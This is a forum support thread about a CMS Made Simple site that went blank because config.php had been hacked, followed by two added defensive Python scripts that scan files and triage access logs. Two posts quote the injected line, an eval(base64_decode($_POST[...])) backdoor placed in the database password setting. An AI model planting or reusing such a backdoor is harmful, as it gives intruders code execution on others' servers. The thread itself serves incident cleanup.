Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 6:45 am
by thomahawk
Hello all!
I installed our CMSMS two years ago, its version is 1.11.11, nothing has been changed for weeks.
Today we suddenly have an empty white homepage. Also when trying to get into the backend, I can not, because the login page also comes up blank. We did not change anything for weeks. And the provider changed to PHP 5.4 about a year ago.
I have other CMSMS installations, even older versions, at the same provider and they run fine.
One difference is: our site uses https and it's forced via .htaccess
but that was always the case, worked until now.
I tried accessing the site without the .htaccess, so, no https forcing, but it did not work either.
Any ideas?
Regards
Thom
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 7:39 am
by Rolf
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 8:54 am
by thomahawk
Hi Rolf
Thanks for the quick response.
I tried $config['debug'] = true; but it makes no difference, I still only get a white page, nothing at all. And no idea as of what may be the cause, or how to get to it without backend access... strange
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 9:03 am
by Jos
I also had these blank pages recently.
I found the error after I had put these lines
ini_set('display_errors',1);
error_reporting(E_ALL);
in the config.php (and deleted them after having solved the errors)
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 12:12 pm
by thomahawk
Hi Jos
Thanks! Your input was right. I got an error message leading me to the other config settings and indeed: They were completely wrong. (I could have seen that but I did not ever think they could have been changed).
Now, is it possible we got hacked???
It looked like this:
$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval ( base64 _ decode($_POST[' a1 '])); exit;//';
$config['db_name'] = 'error';
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 12:17 pm
by Rolf
Yes, that is definitely a sign of a hacked website... :-/
Do you have back-ups?
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 12:22 pm
by thomahawk
Thanks Rolf. But how is this possible? I have never heard of a CMSMS website getting hacked. It's not a rewarding target, not like WordPress or Joomla.
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 12:26 pm
by thomahawk
At least it seems only config.php got hacked.
Following the article here
https://raam.org/2013/cleaning-evalbase ... e-via-ssh/
When I check all files (after downloading from ftp and search content of all files), the malicious code containing "eval(base64_decode" can not be found except in config.
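The file search described in the post above, as an added example that is not part of the thread: a Python scan of a downloaded copy of the site for `eval(` wrapping `base64_decode(`. The whitespace tolerance, the wrapper-call handling, the suffix list and the sample files are assumptions of this sketch; a plain text search for the exact string misses those variants.

```python
import re
import tempfile
from pathlib import Path

# PHP ignores whitespace between tokens and function names are
# case-insensitive, so match loosely; also allow wrapper calls such as
# gzinflate( or str_rot13( between eval( and base64_decode(.
EVAL_B64 = re.compile(
    rb"eval\s*\(\s*(?:@?\w+\s*\(\s*)*base64_decode\s*\(", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".inc", ".phtml", ".tpl"}  # assumed list, extend as needed

def scan_tree(root):
    """Return (relative path, line number, matched text) for every hit."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        data = path.read_bytes()
        # Search the whole file so a call split across lines is still found.
        for m in EVAL_B64.finditer(data):
            lineno = data.count(b"\n", 0, m.start()) + 1
            rel = path.relative_to(root).as_posix()
            hits.append((rel, lineno, m.group(0).decode("ascii", "replace")))
    return hits

def build_sample_tree(root):
    """Constructed sample files; the values are placeholders."""
    root = Path(root)
    (root / "modules").mkdir()
    (root / "config.php").write_text(
        "<?php\n$config['db_name'] = 'cms';\n"
        "$config['db_password'] = '';eval ( base64_decode($_POST['x'])); exit;//';\n")
    (root / "modules" / "cache.php").write_text(
        "<?php\nEVAL(gzinflate(Base64_Decode('AAAA')));\n")
    (root / "index.php").write_text(
        "<?php\n$img = base64_decode($row['thumb']); // legitimate use, no eval\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, lineno, text in scan_tree(tmp):
            print(f"{rel}:{lineno}: {text}")
```

A hit is a lead for manual review, and a clean result only covers this one pattern.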
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 12:27 pm
by Rolf
For sure a website made with CMSMS can be hacked. But CMSMS isn't the cause...
Can be bad web host.
Too easy to break FTP passwords.
Virus on the computer of the editors that put scripts on the webserver along with file uploads.
Old Core or Module versions. (not upgraded)
Other CMS's or old website at the same client webserver.
Etc.
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 5:22 pm
by Dr.CSS
Shared server with WP installed somewhere on it that let someone in..?
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 5:34 pm
by thomahawk
Hi Dr. CSS
Good question, but no, not WordPress. But I dug around a bit, because we do in fact have forum software installed (not by me though), Burning Board by Woltlab. And I found several reports about eval(base64_decode insertions there. The Board itself seems unharmed, but I suppose it looked for the top config file to infect, and got the one of CMSMS. Then if it was looking for a WP-typical folder structure, there is none. And so only config got affected.
Re: Suddenly: Blank empty white page only – https??
Posted: Fri Aug 21, 2015 8:05 pm
by pwg
Hi thomahawk, I had exactly the same scenario happen yesterday to one of my sites.
Same config details and all:
$config['db_hostname'] = '209.59.130.213';
$config['db_username'] = 'er';
$config['db_password'] = '';eval ( base 64_decode ($_POST[ 'a1' ]));ex it; //';
After scanning my files, I found a corruption in another CMSMS site - on the same shared server - check in the root directory for a file "whatever domain name"/google.php.
Probably worth a look.
Cheers,
Paul
Re: Suddenly: Blank empty white page only – https??
Posted: Sat Aug 22, 2015 7:04 am
by thomahawk
Hi pwg
What else do you have hosted except CMSMS? In my case there is a Burning Board forum. I suppose the thing came in through there.
No, I could not find a google.php file. But thanks for the suggestion.
I will leave things as they are now and wait some days. I want to see if it happens again.
Re: Suddenly: Blank empty white page only – https??
Posted: Sat Aug 22, 2015 3:41 pm
by Jeff
Is your hosting account shared, VPS, or a dedicated server?
If it is shared then it doesn't need to be something you host; it could be from another customer on the same machine.
Contact your hoster, most will help you try to figure out how they got in.
If they got in through your account, check the access logs for GET and POST requests. Also check logs for other services that are on your machine (like ftp/ssh).
Re: Suddenly: Blank empty white page only – https??
Posted: Mon Aug 24, 2015 12:33 pm
by thomahawk
I got a report from the hoster, he says they entered using the index.php file and installed into the install folder.
That folder was still on the server, despite the fact that I always remove it, I don't know how that happened.
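The access-log check suggested earlier in the thread, tied to the hoster's finding about the install folder, as an added example that is not part of the thread: a Python triage of web server log lines that groups suspicious requests by client IP. The combined log format, the `/install/` path, the `/admin/` allowlist for POSTs and the sample lines are assumptions of this sketch.

```python
import re
from collections import defaultdict

# "combined" format: ip ident user [time] "METHOD path proto" status size ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

# Assumptions: the installer lives under /install/ and visitors only POST
# to the admin area. Add front-end form endpoints to the allowlist if used.
INSTALL_DIR = re.compile(r"^/install(/|$)", re.IGNORECASE)
EXPECTED_POST = re.compile(r"^/admin/")

def triage(lines):
    """Group suspicious requests by client IP: {ip: [(time, reason, request)]}."""
    findings = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        path = m["path"].split("?", 1)[0]
        if INSTALL_DIR.match(path) and m["status"] != "404":
            reason = "installer reachable"
        elif m["method"] == "POST" and not EXPECTED_POST.match(path):
            reason = "unexpected POST"
        else:
            continue
        request = f'{m["method"]} {path} {m["status"]}'
        findings[m["ip"]].append((m["ts"], reason, request))
    return dict(findings)

# Constructed sample lines (documentation-range addresses, not from the thread).
SAMPLE = [
    '198.51.100.7 - - [20/Aug/2015:03:11:02 +0200] "GET /install/index.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [20/Aug/2015:03:11:09 +0200] "POST /install/index.php HTTP/1.1" 200 830 "-" "-"',
    '198.51.100.7 - - [20/Aug/2015:03:12:40 +0200] "POST /index.php HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.20 - - [20/Aug/2015:08:30:00 +0200] "POST /admin/login.php HTTP/1.1" 302 0 "-" "-"',
    '203.0.113.20 - - [20/Aug/2015:08:31:10 +0200] "GET /index.php?page=news HTTP/1.1" 200 9100 "-" "-"',
    '192.0.2.44 - - [20/Aug/2015:09:00:00 +0200] "GET /install/ HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in triage(SAMPLE).items():
        print(ip)
        for ts, reason, request in events:
            print(f"  {ts}  {reason}: {request}")
```

Access logs do not record POST bodies, so the output shows which clients reached which scripts and when, not what they sent.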